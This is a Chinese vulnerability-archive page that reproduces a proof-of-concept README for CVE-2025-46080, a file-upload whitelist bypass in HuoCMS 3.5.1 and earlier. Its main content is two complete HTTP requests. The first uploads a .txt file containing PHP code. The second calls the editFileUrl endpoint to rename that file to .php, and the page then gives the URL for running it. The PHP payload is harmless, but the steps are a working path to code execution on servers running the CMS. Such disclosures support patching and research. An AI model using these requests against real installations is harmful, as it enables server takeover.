关联漏洞
标题:
HuoCMS 安全漏洞
(CVE-2025-46080)
描述:Suq HuoCMS是中国南京数旗科技(Suq)公司的一种基于ThinkPHP6和Vue3开发的现代化内容管理系统。 HuoCMS 3.5.1版本存在安全漏洞,该漏洞源于文件上传功能可能绕过白名单限制,导致服务器被控制。
描述
Details
介绍
## BUG_Author:
yggcwhat
## Affected version:
Huocms
## Vendor:
https://huocms.com/
## Source Code Address:
https://gitee.com/digital-flag/huocms
## Vulnerability File:
AttachmentController.php
## Affected Version:
HuoCMS - <=V3.5.1
## Description:
app ->controller ->backend -> AttachmentController.php:editFileUrl()
The suffix of $newPathUrl in the "copy" function called in the "editFileUrl" method is not verified by the whitelist, which can be exploited to modify the file name. The suffix is controlled by the passed-in suffix_url and is controllable.
Step 1: Upload a file with a whitelisted suffix that contains malicious content in advance, and record the file ID at the same time.
```
POST /attachment/uploadAndSave HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: token
Content-Type: multipart/form-data; boundary=----geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Length: 581
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/admin.php/Index/index.html
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="type"
2
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="attachment_cate_id"
0
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="reduce_img"
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9
Content-Disposition: form-data; name="file"; filename="test.txt"
Content-Type: text/plain
<?php
echo "hello word!"
?>
------geckoformboundaryd7df19e74fd06439fac43ff3e8a7a4b9--
```
Based on the content, the ID is determined to be 67.
Step 2: Then construct a request based on the editFileUrl, rename the one with id 67, where the copy function in the vulnerability's editFileUrl is called to rename the file with an illegal suffix.
```
POST /attachment/editFileUrl HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Authorization: token
Content-Length: 83
Origin: http://127.0.0.1
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
id=67&name=test&prefix_url=&suffix_url=file/20250416/test.php&description=123123123
```
Note: To modify it again, you need to change the filename of `suffix_url` to bypass the `copy` function triggered by `$oldPathUrl != $newPathUrl` inside `editFileUrl`.
Access URL: http://127.0.0.1/storage/file/20250416/test.php
## Reference:
http://huocms.com
https://github.com/yggcwhat/CVE-2025-46080/edit/main/README.md
https://www.huocms.com/
文件快照
[4.0K] /data/pocs/e8c94f598e034908dbed871c544f22a40f8ac412
└── [3.4K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。